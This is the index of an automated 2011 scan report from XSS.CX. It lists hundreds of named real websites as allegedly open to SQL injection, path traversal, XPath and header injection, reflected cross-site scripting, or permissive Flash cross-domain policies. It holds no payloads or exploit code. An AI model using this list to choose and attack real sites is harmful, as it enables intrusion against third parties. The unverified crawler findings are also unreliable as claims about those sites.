XSS, SQL Injection, HTTP Header Injection, DORK Report for April 2, 2011

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Sat Apr 02 09:55:17 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler
Loading

1. SQL injection

1.1. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27 [adurl parameter]

1.2. http://googleads.g.doubleclick.net/pagead/ads [shv parameter]

1.3. http://www.airtran.com/favicon.ico [REST URL parameter 1]

1.4. http://www.bbt.com/favicon.ico [REST URL parameter 1]

1.5. http://www.dealtime.com/favicon.ico [REST URL parameter 1]

1.6. http://www.essortment.com/favicon.ico [REST URL parameter 1]

1.7. http://www.ftd.com/favicon.ico [REST URL parameter 1]

1.8. http://www.guitarcenter.com/favicon.ico [User-Agent HTTP header]

1.9. http://www.inc.com/favicon.ico [REST URL parameter 1]

1.10. http://www.psu.edu/favicon.ico [Referer HTTP header]

1.11. http://www.psu.edu/favicon.ico [User-Agent HTTP header]

1.12. http://www.scholastic.com/favicon.ico [REST URL parameter 1]

2. File path traversal

2.1. http://www.bodybuilding.com/favicon.ico [REST URL parameter 1]

2.2. http://www.buzzfeed.com/favicon.ico [REST URL parameter 1]

2.3. http://www.cabelas.com/favicon.ico [REST URL parameter 1]

2.4. http://www.info.com/favicon.ico [REST URL parameter 1]

3. XPath injection

3.1. http://www.cartoonnetwork.com/favicon.ico [REST URL parameter 1]

3.2. http://www.ning.com/favicon.ico [REST URL parameter 1]

3.3. http://www.thefind.com/favicon.ico [REST URL parameter 1]

3.4. http://www.wwe.com/favicon.ico [REST URL parameter 1]

4. HTTP PUT enabled

5. HTTP header injection

5.1. http://www.ew.com/favicon.ico [REST URL parameter 1]

5.2. http://www.familyeducation.com/favicon.ico [REST URL parameter 1]

5.3. http://www.health.com/favicon.ico [REST URL parameter 1]

5.4. http://www.homestead.com/favicon.ico [REST URL parameter 1]

5.5. http://www.instyle.com/favicon.ico [REST URL parameter 1]

5.6. http://www.livingsocial.com/favicon.ico [REST URL parameter 1]

5.7. http://www.people.com/favicon.ico [REST URL parameter 1]

5.8. http://www.peoplestylewatch.com/favicon.ico [REST URL parameter 1]

5.9. http://www.salesforce.com/favicon.ico [REST URL parameter 1]

5.10. http://www.shop.com/favicon.ico [name of an arbitrarily supplied request parameter]

5.11. http://www.shopcompanion.com/favicon.ico [name of an arbitrarily supplied request parameter]

5.12. http://www.tbo.com/favicon.ico [REST URL parameter 1]

5.13. http://www.thisoldhouse.com/favicon.ico [REST URL parameter 1]

5.14. http://www.wn.com/favicon.ico [REST URL parameter 1]

5.15. http://www.youravon.com/favicon.ico [REST URL parameter 1]

6. Cross-site scripting (reflected)

6.1. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27 [adurl parameter]

6.2. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27 [ai parameter]

6.3. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27 [client parameter]

6.4. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27 [num parameter]

6.5. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27 [sig parameter]

6.6. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27 [sz parameter]

6.7. http://www.4shared.com/favicon.ico [REST URL parameter 1]

6.8. http://www.4shared.com/favicon.ico [REST URL parameter 1]

6.9. http://www.aboutus.org/favicon.ico [REST URL parameter 1]

6.10. http://www.allbusiness.com/favicon.ico [REST URL parameter 1]

6.11. http://www.allbusiness.com/favicon.ico [REST URL parameter 1]

6.12. http://www.allvoices.com/favicon.ico [REST URL parameter 1]

6.13. http://www.answerbag.com/favicon.ico [REST URL parameter 1]

6.14. http://www.beyond.com/favicon.ico [REST URL parameter 1]

6.15. http://www.biblegateway.com/favicon.ico [REST URL parameter 1]

6.16. http://www.biblegateway.com/favicon.ico [REST URL parameter 1]

6.17. http://www.blackplanet.com/favicon.ico [REST URL parameter 1]

6.18. http://www.blurtit.com/favicon.ico [REST URL parameter 1]

6.19. http://www.blurtit.com/favicon.ico [REST URL parameter 1]

6.20. http://www.booking.com/favicon.ico [REST URL parameter 1]

6.21. http://www.buzzillions.com/favicon.ico [REST URL parameter 1]

6.22. http://www.buzzillions.com/favicon.ico [REST URL parameter 1]

6.23. http://www.buzzillions.com/favicon.ico [REST URL parameter 1]

6.24. http://www.caringbridge.org/favicon.ico [REST URL parameter 1]

6.25. http://www.cliffsnotes.com/favicon.ico [REST URL parameter 1]

6.26. http://www.colbertnation.com/favicon.ico [REST URL parameter 1]

6.27. http://www.collegehumor.com/favicon.ico [REST URL parameter 1]

6.28. http://www.collegehumor.com/favicon.ico [REST URL parameter 1]

6.29. http://www.collegehumor.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.30. http://www.collegehumor.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.31. http://www.craveonline.com/favicon.ico [REST URL parameter 1]

6.32. http://www.craveonline.com/favicon.ico [REST URL parameter 1]

6.33. http://www.csmonitor.com/favicon.ico [REST URL parameter 1]

6.34. http://www.docstoc.com/favicon.ico [REST URL parameter 1]

6.35. http://www.domaintools.com/favicon.ico [REST URL parameter 1]

6.36. http://www.driverside.com/favicon.ico [REST URL parameter 1]

6.37. http://www.education.com/favicon.ico [REST URL parameter 1]

6.38. http://www.egotastic.com/favicon.ico [REST URL parameter 1]

6.39. http://www.egotastic.com/favicon.ico [REST URL parameter 1]

6.40. http://www.elyrics.net/favicon.ico [REST URL parameter 1]

6.41. http://www.elyricsworld.com/favicon.ico [REST URL parameter 1]

6.42. http://www.elyricsworld.com/favicon.ico [REST URL parameter 1]

6.43. http://www.elyricsworld.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.44. http://www.elyricsworld.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.45. http://www.everydayhealth.com/favicon.ico [REST URL parameter 1]

6.46. http://www.gamespot.com/favicon.ico [REST URL parameter 1]

6.47. http://www.gamestop.com/favicon.ico [REST URL parameter 1]

6.48. http://www.gather.com/favicon.ico [REST URL parameter 1]

6.49. http://www.gather.com/favicon.ico [REST URL parameter 1]

6.50. http://www.gourmandia.com/favicon.ico [REST URL parameter 1]

6.51. http://www.healthline.com/favicon.ico [REST URL parameter 1]

6.52. http://www.healthline.com/favicon.ico [REST URL parameter 1]

6.53. http://www.hollywood.com/favicon.ico [REST URL parameter 1]

6.54. http://www.inc.com/favicon.ico [REST URL parameter 1]

6.55. http://www.instructables.com/favicon.ico [REST URL parameter 1]

6.56. http://www.kaboose.com/favicon.ico [REST URL parameter 1]

6.57. http://www.letssingit.com/favicon.ico [REST URL parameter 1]

6.58. http://www.letssingit.com/favicon.ico [REST URL parameter 1]

6.59. http://www.mainstreet.com/favicon.ico [REST URL parameter 1]

6.60. http://www.manta.com/favicon.ico [REST URL parameter 1]

6.61. http://www.manta.com/favicon.ico [REST URL parameter 1]

6.62. http://www.manta.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.63. http://www.manta.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.64. http://www.marthastewart.com/favicon.ico [REST URL parameter 1]

6.65. http://www.mayoclinic.com/favicon.ico [REST URL parameter 1]

6.66. http://www.mayoclinic.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.67. http://www.mayoclinic.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.68. http://www.mediaite.com/favicon.ico [REST URL parameter 1]

6.69. http://www.motime.com/favicon.ico [REST URL parameter 1]

6.70. http://www.motime.com/favicon.ico [REST URL parameter 1]

6.71. http://www.mp3raid.com/favicon.ico [REST URL parameter 1]

6.72. http://www.mp3raid.com/favicon.ico [REST URL parameter 1]

6.73. http://www.mycricket.com/favicon.ico [REST URL parameter 1]

6.74. http://www.mylifetime.com/favicon.ico [REST URL parameter 1]

6.75. http://www.mylifetime.com/favicon.ico [REST URL parameter 1]

6.76. http://www.nydailynews.com/favicon.ico [REST URL parameter 1]

6.77. http://www.oodle.com/favicon.ico [REST URL parameter 1]

6.78. http://www.oodle.com/favicon.ico [REST URL parameter 1]

6.79. http://www.pronto.com/favicon.ico [REST URL parameter 1]

6.80. http://www.rent.com/favicon.ico [REST URL parameter 1]

6.81. http://www.rent.com/favicon.ico [REST URL parameter 1]

6.82. http://www.reverbnation.com/favicon.ico [REST URL parameter 1]

6.83. http://www.shangri-la.com/favicon.ico [REST URL parameter 1]

6.84. http://www.shopcompanion.com/favicon.ico [REST URL parameter 1]

6.85. http://www.smarter.com/favicon.ico [REST URL parameter 1]

6.86. http://www.soft82.com/favicon.ico [REST URL parameter 1]

6.87. http://www.songmeanings.net/favicon.ico [REST URL parameter 1]

6.88. http://www.songmeanings.net/favicon.ico [REST URL parameter 1]

6.89. http://www.spike.com/favicon.ico [REST URL parameter 1]

6.90. http://www.supercheats.com/favicon.ico [REST URL parameter 1]

6.91. http://www.tarot.com/favicon.ico [REST URL parameter 1]

6.92. http://www.tarot.com/favicon.ico [REST URL parameter 1]

6.93. http://www.tarot.com/favicon.ico [REST URL parameter 1]

6.94. http://www.thedailybeast.com/favicon.ico [REST URL parameter 1]

6.95. http://www.thedailyshow.com/favicon.ico [REST URL parameter 1]

6.96. http://www.thehollywoodgossip.com/favicon.ico [REST URL parameter 1]

6.97. http://www.thirdage.com/favicon.ico [REST URL parameter 1]

6.98. http://www.thomasnet.com/favicon.ico [REST URL parameter 1]

6.99. http://www.tradekey.com/favicon.ico [REST URL parameter 1]

6.100. http://www.trails.com/favicon.ico [REST URL parameter 1]

6.101. http://www.travelpod.com/favicon.ico [REST URL parameter 1]

6.102. http://www.videojug.com/favicon.ico [REST URL parameter 1]

6.103. http://www.videosurf.com/favicon.ico [REST URL parameter 1]

6.104. http://www.walletpop.com/favicon.ico [REST URL parameter 1]

6.105. http://www.washington.edu/favicon.ico [REST URL parameter 1]

6.106. http://www.wowhead.com/favicon.ico [REST URL parameter 1]

6.107. http://www.wowhead.com/favicon.ico [REST URL parameter 1]

6.108. http://www.yakaz.com/favicon.ico [REST URL parameter 1]

6.109. http://www.yellowpages.com/favicon.ico [REST URL parameter 1]

6.110. http://www.yellowpages.com/favicon.ico [REST URL parameter 1]

6.111. http://www.yourdictionary.com/favicon.ico [REST URL parameter 1]

6.112. http://www.kcom.com/contact-us/ [Referer HTTP header]

6.113. http://www.canada.com/favicon.ico [REST URL parameter 1]

6.114. http://www.multiply.com/favicon.ico [REST URL parameter 1]

6.115. http://www.multiply.com/favicon.ico [REST URL parameter 1]

6.116. http://www.multiply.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.117. http://www.shop.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.118. http://www.shop.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.119. http://www.shopcompanion.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.120. http://www.shopcompanion.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.121. http://www.townhall.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.122. http://www.townhall.com/favicon.ico [name of an arbitrarily supplied request parameter]

7. Flash cross-domain policy

7.1. http://ad.doubleclick.net/crossdomain.xml

7.2. http://fls.doubleclick.net/crossdomain.xml

7.3. http://s0.2mdn.net/crossdomain.xml

7.4. http://smp.adviva.net/crossdomain.xml

7.5. http://www.43things.com/crossdomain.xml

7.6. http://www.about.com/crossdomain.xml

7.7. http://www.accesshollywood.com/crossdomain.xml

7.8. http://www.accuweather.com/crossdomain.xml

7.9. http://www.addictinggames.com/crossdomain.xml

7.10. http://www.adriver.ru/crossdomain.xml

7.11. http://www.ajc.com/crossdomain.xml

7.12. http://www.allvoices.com/crossdomain.xml

7.13. http://www.ally.com/crossdomain.xml

7.14. http://www.ancestry.com/crossdomain.xml

7.15. http://www.answerstv.com/crossdomain.xml

7.16. http://www.apartmenthomeliving.com/crossdomain.xml

7.17. http://www.apartments.com/crossdomain.xml

7.18. http://www.archive.org/crossdomain.xml

7.19. http://www.askmen.com/crossdomain.xml

7.20. http://www.atom.com/crossdomain.xml

7.21. http://www.babelgum.com/crossdomain.xml

7.22. http://www.biblegateway.com/crossdomain.xml

7.23. http://www.bigpoint.com/crossdomain.xml

7.24. http://www.bizjournals.com/crossdomain.xml

7.25. http://www.blackberry.com/crossdomain.xml

7.26. http://www.blogs.com/crossdomain.xml

7.27. http://www.bloomberg.com/crossdomain.xml

7.28. http://www.boostmobile.com/crossdomain.xml

7.29. http://www.bravotv.com/crossdomain.xml

7.30. http://www.break.com/crossdomain.xml

7.31. http://www.buzznet.com/crossdomain.xml

7.32. http://www.cafemom.com/crossdomain.xml

7.33. http://www.cbs.com/crossdomain.xml

7.34. http://www.cbsinteractive.com/crossdomain.xml

7.35. http://www.cbssports.com/crossdomain.xml

7.36. http://www.clear-request.com/crossdomain.xml

7.37. http://www.cmt.com/crossdomain.xml

7.38. http://www.colbertnation.com/crossdomain.xml

7.39. http://www.collegehumor.com/crossdomain.xml

7.40. http://www.comedycentral.com/crossdomain.xml

7.41. http://www.contactatonce.com/crossdomain.xml

7.42. http://www.cracked.com/crossdomain.xml

7.43. http://www.crackle.com/crossdomain.xml

7.44. http://www.craveonline.com/crossdomain.xml

7.45. http://www.curse.com/crossdomain.xml

7.46. http://www.daylife.com/crossdomain.xml

7.47. http://www.degrees.info/crossdomain.xml

7.48. http://www.docstoc.com/crossdomain.xml

7.49. http://www.doctoroz.com/crossdomain.xml

7.50. http://www.ebaumsworld.com/crossdomain.xml

7.51. http://www.education.com/crossdomain.xml

7.52. http://www.ehow.co.uk/crossdomain.xml

7.53. http://www.eventful.com/crossdomain.xml

7.54. http://www.everydayhealth.com/crossdomain.xml

7.55. http://www.evtv1.com/crossdomain.xml

7.56. http://www.ew.com/crossdomain.xml

7.57. http://www.ez-tracks.com/crossdomain.xml

7.58. http://www.flixster.com/crossdomain.xml

7.59. http://www.freeonlinegames.com/crossdomain.xml

7.60. http://www.g4tv.com/crossdomain.xml

7.61. http://www.gamerdna.com/crossdomain.xml

7.62. http://www.gamesradar.com/crossdomain.xml

7.63. http://www.gametrailers.com/crossdomain.xml

7.64. http://www.gourmandia.com/crossdomain.xml

7.65. http://www.greenwichmeantime.com/crossdomain.xml

7.66. http://www.groupon.com/crossdomain.xml

7.67. http://www.health.com/crossdomain.xml

7.68. http://www.hiconversion.com/crossdomain.xml

7.69. http://www.hodesiq.com/crossdomain.xml

7.70. http://www.hollywoodreporter.com/crossdomain.xml

7.71. http://www.howstuffworks.com/crossdomain.xml

7.72. http://www.huffingtonpost.com/crossdomain.xml

7.73. http://www.imagebam.com/crossdomain.xml

7.74. http://www.imageshack.us/crossdomain.xml

7.75. http://www.ingdirect.com/crossdomain.xml

7.76. http://www.instructables.com/crossdomain.xml

7.77. http://www.instyle.com/crossdomain.xml

7.78. http://www.intellicast.com/crossdomain.xml

7.79. http://www.kaboodle.com/crossdomain.xml

7.80. http://www.like.com/crossdomain.xml

7.81. http://www.liveleak.com/crossdomain.xml

7.82. http://www.manualsonline.com/crossdomain.xml

7.83. http://www.mapquest.com/crossdomain.xml

7.84. http://www.marthastewart.com/crossdomain.xml

7.85. http://www.mate1.net/crossdomain.xml

7.86. http://www.menshealth.com/crossdomain.xml

7.87. http://www.metacafe.com/crossdomain.xml

7.88. http://www.metrolyrics.com/crossdomain.xml

7.89. http://www.minorleaguebaseball.com/crossdomain.xml

7.90. http://www.mlb.com/crossdomain.xml

7.91. http://www.mmo-champion.com/crossdomain.xml

7.92. http://www.mtv.com/crossdomain.xml

7.93. http://www.myrecipes.com/crossdomain.xml

7.94. http://www.ncm.com/crossdomain.xml

7.95. http://www.newser.com/crossdomain.xml

7.96. http://www.newsok.com/crossdomain.xml

7.97. http://www.nickjr.com/crossdomain.xml

7.98. http://www.nola.com/crossdomain.xml

7.99. http://www.nydailynews.com/crossdomain.xml

7.100. http://www.oodle.com/crossdomain.xml

7.101. http://www.openforum.com/crossdomain.xml

7.102. http://www.opportunity.co/crossdomain.xml

7.103. http://www.outdoorchannel.com/crossdomain.xml

7.104. http://www.pcworld.com/crossdomain.xml

7.105. http://www.people.com/crossdomain.xml

7.106. http://www.peoplestylewatch.com/crossdomain.xml

7.107. http://www.pittsburghlive.com/crossdomain.xml

7.108. http://www.playfin.com/crossdomain.xml

7.109. http://www.pokerstars.com/crossdomain.xml

7.110. http://www.popularscreensavers.com/crossdomain.xml

7.111. http://www.rawtube.com/crossdomain.xml

7.112. http://www.realsimple.com/crossdomain.xml

7.113. http://www.redorbit.com/crossdomain.xml

7.114. http://www.scout.com/crossdomain.xml

7.115. http://www.sendspace.com/crossdomain.xml

7.116. http://www.sfgate.com/crossdomain.xml

7.117. http://www.sheknows.com/crossdomain.xml

7.118. http://www.shockwave.com/crossdomain.xml

7.119. http://www.slideshare.net/crossdomain.xml

7.120. http://www.spike.com/crossdomain.xml

7.121. http://www.sportsnetwork.com/crossdomain.xml

7.122. http://www.swagbucks.com/crossdomain.xml

7.123. http://www.syfy.com/crossdomain.xml

7.124. http://www.tampabay.com/crossdomain.xml

7.125. http://www.tastebook.com/crossdomain.xml

7.126. http://www.teennick.com/crossdomain.xml

7.127. http://www.terra.com/crossdomain.xml

7.128. http://www.thedailybeast.com/crossdomain.xml

7.129. http://www.thedailyshow.com/crossdomain.xml

7.130. http://www.theonion.com/crossdomain.xml

7.131. http://www.thisoldhouse.com/crossdomain.xml

7.132. http://www.time.com/crossdomain.xml

7.133. http://www.totalbeauty.com/crossdomain.xml

7.134. http://www.travelpod.com/crossdomain.xml

7.135. http://www.urbanspoon.com/crossdomain.xml

7.136. http://www.ustream.tv/crossdomain.xml

7.137. http://www.vh1.com/crossdomain.xml

7.138. http://www.videosurf.com/crossdomain.xml

7.139. http://www.weather.gov/crossdomain.xml

7.140. http://www.weatherbug.com/crossdomain.xml

7.141. http://www.webkinz.com/crossdomain.xml

7.142. http://www.webmd.com/crossdomain.xml

7.143. http://www.wix.com/crossdomain.xml

7.144. http://www.wowhead.com/crossdomain.xml

7.145. http://www.wunderground.com/crossdomain.xml

7.146. http://www.xanga.com/crossdomain.xml

7.147. http://www.yardbarker.com/crossdomain.xml

7.148. http://www.yfrog.com/crossdomain.xml

7.149. http://www.younghollywood.com/crossdomain.xml

7.150. http://www.yourfilehost.com/crossdomain.xml

7.151. http://www.zillow.com/crossdomain.xml

7.152. http://www.zoosnet.net/crossdomain.xml

7.153. http://www.zvents.com/crossdomain.xml

7.154. http://googleads.g.doubleclick.net/crossdomain.xml

7.155. http://pagead2.googlesyndication.com/crossdomain.xml

7.156. http://www.123greetings.com/crossdomain.xml

7.157. http://www.4shared.com/crossdomain.xml

7.158. http://www.4tubemate.com/crossdomain.xml

7.159. http://www.6pm.com/crossdomain.xml

7.160. http://www.acehardware.com/crossdomain.xml

7.161. http://www.adobe.com/crossdomain.xml

7.162. http://www.ae.com/crossdomain.xml

7.163. http://www.aeropostale.com/crossdomain.xml

7.164. http://www.allbusiness.com/crossdomain.xml

7.165. http://www.allposters.com/crossdomain.xml

7.166. http://www.allrecipes.com/crossdomain.xml

7.167. http://www.altavista.com/crossdomain.xml

7.168. http://www.amazon.co.uk/crossdomain.xml

7.169. http://www.americangreetings.com/crossdomain.xml

7.170. http://www.aolnews.com/crossdomain.xml

7.171. http://www.apple.com/crossdomain.xml

7.172. http://www.associatedcontent.com/crossdomain.xml

7.173. http://www.astrology.com/crossdomain.xml

7.174. http://www.att.com/crossdomain.xml

7.175. http://www.azcentral.com/crossdomain.xml

7.176. http://www.babiesrus.com/crossdomain.xml

7.177. http://www.babycenter.com/crossdomain.xml

7.178. http://www.barackobama.com/crossdomain.xml

7.179. http://www.barbie.com/crossdomain.xml

7.180. http://www.barnesandnoble.com/crossdomain.xml

7.181. http://www.bathandbodyworks.com/crossdomain.xml

7.182. http://www.bbc.co.uk/crossdomain.xml

7.183. http://www.bettycrocker.com/crossdomain.xml

7.184. http://www.blastro.com/crossdomain.xml

7.185. http://www.blogtv.com/crossdomain.xml

7.186. http://www.bluemountain.com/crossdomain.xml

7.187. http://www.bnet.com/crossdomain.xml

7.188. http://www.bodybuilding.com/crossdomain.xml

7.189. http://www.britannica.com/crossdomain.xml

7.190. http://www.businessweek.com/crossdomain.xml

7.191. http://www.buy.com/crossdomain.xml

7.192. http://www.cabelas.com/crossdomain.xml

7.193. http://www.canada.com/crossdomain.xml

7.194. http://www.candystand.com/crossdomain.xml

7.195. http://www.caranddriver.com/crossdomain.xml

7.196. http://www.careerbuilder.com/crossdomain.xml

7.197. http://www.careerrookie.com/crossdomain.xml

7.198. http://www.carnival.com/crossdomain.xml

7.199. http://www.cars.com/crossdomain.xml

7.200. http://www.cartoonnetwork.com/crossdomain.xml

7.201. http://www.casttv.com/crossdomain.xml

7.202. http://www.cbc.ca/crossdomain.xml

7.203. http://www.cbsnews.com/crossdomain.xml

7.204. http://www.chacha.com/crossdomain.xml

7.205. http://www.charlotteobserver.com/crossdomain.xml

7.206. http://www.chemistry.com/crossdomain.xml

7.207. http://www.chevrolet.com/crossdomain.xml

7.208. http://www.chicagotribune.com/crossdomain.xml

7.209. http://www.chow.com/crossdomain.xml

7.210. http://www.chron.com/crossdomain.xml

7.211. http://www.cisco.com/crossdomain.xml

7.212. http://www.classmates.com/crossdomain.xml

7.213. http://www.clocklink.com/crossdomain.xml

7.214. http://www.clubpenguin.com/crossdomain.xml

7.215. http://www.cnbc.com/crossdomain.xml

7.216. http://www.cnet.com/crossdomain.xml

7.217. http://www.cnn.com/crossdomain.xml

7.218. http://www.cobaltnitra.com/crossdomain.xml

7.219. http://www.collegeboard.com/crossdomain.xml

7.220. http://www.comcast.net/crossdomain.xml

7.221. http://www.consumerreports.org/crossdomain.xml

7.222. http://www.consumersearch.com/crossdomain.xml

7.223. http://www.costco.com/crossdomain.xml

7.224. http://www.dailyfinance.com/crossdomain.xml

7.225. http://www.dailykos.com/crossdomain.xml

7.226. http://www.dailymotion.com/crossdomain.xml

7.227. http://www.dallascowboys.com/crossdomain.xml

7.228. http://www.dallasnews.com/crossdomain.xml

7.229. http://www.datpiff.com/crossdomain.xml

7.230. http://www.dell.com/crossdomain.xml

7.231. http://www.demdex.net/crossdomain.xml

7.232. http://www.dickssportinggoods.com/crossdomain.xml

7.233. http://www.directv.com/crossdomain.xml

7.234. http://www.discovery.com/crossdomain.xml

7.235. http://www.diynetwork.com/crossdomain.xml

7.236. http://www.dslreports.com/crossdomain.xml

7.237. http://www.dt00.net/crossdomain.xml

7.238. http://www.ebay.ca/crossdomain.xml

7.239. http://www.economist.com/crossdomain.xml

7.240. http://www.edmunds.com/crossdomain.xml

7.241. http://www.eharmony.com/crossdomain.xml

7.242. http://www.elle.com/crossdomain.xml

7.243. http://www.emedtv.com/crossdomain.xml

7.244. http://www.engadget.com/crossdomain.xml

7.245. http://www.entertonement.com/crossdomain.xml

7.246. http://www.eonline.com/crossdomain.xml

7.247. http://www.epa.gov/crossdomain.xml

7.248. http://www.etsy.com/crossdomain.xml

7.249. http://www.evite.com/crossdomain.xml

7.250. http://www.expedia.com/crossdomain.xml

7.251. http://www.factmonster.com/crossdomain.xml

7.252. http://www.familyeducation.com/crossdomain.xml

7.253. http://www.famousfootwear.com/crossdomain.xml

7.254. http://www.fandango.com/crossdomain.xml

7.255. http://www.fanfiction.net/crossdomain.xml

7.256. http://www.fanpop.com/crossdomain.xml

7.257. http://www.fantage.com/crossdomain.xml

7.258. http://www.fastcompany.com/crossdomain.xml

7.259. http://www.fedex.com/crossdomain.xml

7.260. http://www.fidelity.com/crossdomain.xml

7.261. http://www.finishline.com/crossdomain.xml

7.262. http://www.food.com/crossdomain.xml

7.263. http://www.foodnetwork.com/crossdomain.xml

7.264. http://www.forbes.com/crossdomain.xml

7.265. http://www.freelotto.com/crossdomain.xml

7.266. http://www.ft.com/crossdomain.xml

7.267. http://www.ftd.com/crossdomain.xml

7.268. http://www.funbrain.com/crossdomain.xml

7.269. http://www.funnyordie.com/crossdomain.xml

7.270. http://www.gaiaonline.com/crossdomain.xml

7.271. http://www.gamespot.com/crossdomain.xml

7.272. http://www.gamestop.com/crossdomain.xml

7.273. http://www.gamevance.com/crossdomain.xml

7.274. http://www.gap.com/crossdomain.xml

7.275. http://www.gather.com/crossdomain.xml

7.276. http://www.geico.com/crossdomain.xml

7.277. http://www.gifts.com/crossdomain.xml

7.278. http://www.godaddy.com/crossdomain.xml

7.279. http://www.goodreads.com/crossdomain.xml

7.280. http://www.guardian.co.uk/crossdomain.xml

7.281. http://www.hallmark.com/crossdomain.xml

7.282. http://www.hbo.com/crossdomain.xml

7.283. http://www.healthcentral.com/crossdomain.xml

7.284. http://www.hgtv.com/crossdomain.xml

7.285. http://www.hhs.gov/crossdomain.xml

7.286. http://www.hi5.com/crossdomain.xml

7.287. http://www.history.com/crossdomain.xml

7.288. http://www.hollywood.com/crossdomain.xml

7.289. http://www.hollywoodlife.com/crossdomain.xml

7.290. http://www.homedepot.com/crossdomain.xml

7.291. http://www.hp.com/crossdomain.xml

7.292. http://www.hsn.com/crossdomain.xml

7.293. http://www.hulu.com/crossdomain.xml

7.294. http://www.ichotelsgroup.com/crossdomain.xml

7.295. http://www.ikea.com/crossdomain.xml

7.296. http://www.ilike.com/crossdomain.xml

7.297. http://www.imdb.com/crossdomain.xml

7.298. http://www.indiatimes.com/crossdomain.xml

7.299. http://www.infoplease.com/crossdomain.xml

7.300. http://www.intel.com/crossdomain.xml

7.301. http://www.intuit.com/crossdomain.xml

7.302. http://www.ioffer.com/crossdomain.xml

7.303. http://www.istockphoto.com/crossdomain.xml

7.304. http://www.itt-tech.edu/crossdomain.xml

7.305. http://www.iwin.com/crossdomain.xml

7.306. http://www.jtv.com/crossdomain.xml

7.307. http://www.justin.tv/crossdomain.xml

7.308. http://www.kaboose.com/crossdomain.xml

7.309. http://www.kbb.com/crossdomain.xml

7.310. http://www.kenexa.com/crossdomain.xml

7.311. http://www.king.com/crossdomain.xml

7.312. http://www.kmart.com/crossdomain.xml

7.313. http://www.kodakgallery.com/crossdomain.xml

7.314. http://www.kraftrecipes.com/crossdomain.xml

7.315. http://www.krillion.com/crossdomain.xml

7.316. http://www.last.fm/crossdomain.xml

7.317. http://www.latimes.com/crossdomain.xml

7.318. http://www.legacy.com/crossdomain.xml

7.319. http://www.lego.com/crossdomain.xml

7.320. http://www.livecams.com/crossdomain.xml

7.321. http://www.livenation.com/crossdomain.xml

7.322. http://www.llbean.com/crossdomain.xml

7.323. http://www.macys.com/crossdomain.xml

7.324. http://www.mail.com/crossdomain.xml

7.325. http://www.marykay.com/crossdomain.xml

7.326. http://www.mastercard.com/crossdomain.xml

7.327. http://www.match.com/crossdomain.xml

7.328. http://www.mcafee.com/crossdomain.xml

7.329. http://www.medcohealth.com/crossdomain.xml

7.330. http://www.medscape.com/crossdomain.xml

7.331. http://www.meebo.com/crossdomain.xml

7.332. http://www.meetlocals.com/crossdomain.xml

7.333. http://www.meetup.com/crossdomain.xml

7.334. http://www.megaupload.com/crossdomain.xml

7.335. http://www.megavideo.com/crossdomain.xml

7.336. http://www.merck.com/crossdomain.xml

7.337. http://www.merriam-webster.com/crossdomain.xml

7.338. http://www.military.com/crossdomain.xml

7.339. http://www.mindjolt.com/crossdomain.xml

7.340. http://www.miniclip.com/crossdomain.xml

7.341. http://www.miracleworkers.com/crossdomain.xml

7.342. http://www.mocospace.com/crossdomain.xml

7.343. http://www.modelmayhem.com/crossdomain.xml

7.344. http://www.moshimonsters.com/crossdomain.xml

7.345. http://www.moviesunlimited.com/crossdomain.xml

7.346. http://www.msnbc.com/crossdomain.xml

7.347. http://www.mybloglog.com/crossdomain.xml

7.348. http://www.mycokerewards.com/crossdomain.xml

7.349. http://www.myheritage.com/crossdomain.xml

7.350. http://www.mylifetime.com/crossdomain.xml

7.351. http://www.myspace.com/crossdomain.xml

7.352. http://www.myxer.com/crossdomain.xml

7.353. http://www.myyearbook.com/crossdomain.xml

7.354. http://www.nascar.com/crossdomain.xml

7.355. http://www.nationalgeographic.com/crossdomain.xml

7.356. http://www.nba.com/crossdomain.xml

7.357. http://www.nbc.com/crossdomain.xml

7.358. http://www.nbcnewyork.com/crossdomain.xml

7.359. http://www.netflix.com/crossdomain.xml

7.360. http://www.newegg.com/crossdomain.xml

7.361. http://www.newport-news.com/crossdomain.xml

7.362. http://www.newsvine.com/crossdomain.xml

7.363. http://www.newsweek.com/crossdomain.xml

7.364. http://www.nfl.com/crossdomain.xml

7.365. http://www.nhl.com/crossdomain.xml

7.366. http://www.nike.com/crossdomain.xml

7.367. http://www.npr.org/crossdomain.xml

7.368. http://www.nwsource.com/crossdomain.xml

7.369. http://www.nypost.com/crossdomain.xml

7.370. http://www.nytimes.com/crossdomain.xml

7.371. http://www.opentable.com/crossdomain.xml

7.372. http://www.opera.com/crossdomain.xml

7.373. http://www.opinionshere.com/crossdomain.xml

7.374. http://www.oprah.com/crossdomain.xml

7.375. http://www.oracle.com/crossdomain.xml

7.376. http://www.ourstage.com/crossdomain.xml

7.377. http://www.overstock.com/crossdomain.xml

7.378. http://www.pandora.com/crossdomain.xml

7.379. http://www.parentsconnect.com/crossdomain.xml

7.380. http://www.partypoker.com/crossdomain.xml

7.381. http://www.paypal.com/crossdomain.xml

7.382. http://www.pbs.org/crossdomain.xml

7.383. http://www.pch.com/crossdomain.xml

7.384. http://www.pchlotto.com/crossdomain.xml

7.385. http://www.petfinder.com/crossdomain.xml

7.386. http://www.petside.com/crossdomain.xml

7.387. http://www.petsmart.com/crossdomain.xml

7.388. http://www.pga.com/crossdomain.xml

7.389. http://www.pgatour.com/crossdomain.xml

7.390. http://www.philly.com/crossdomain.xml

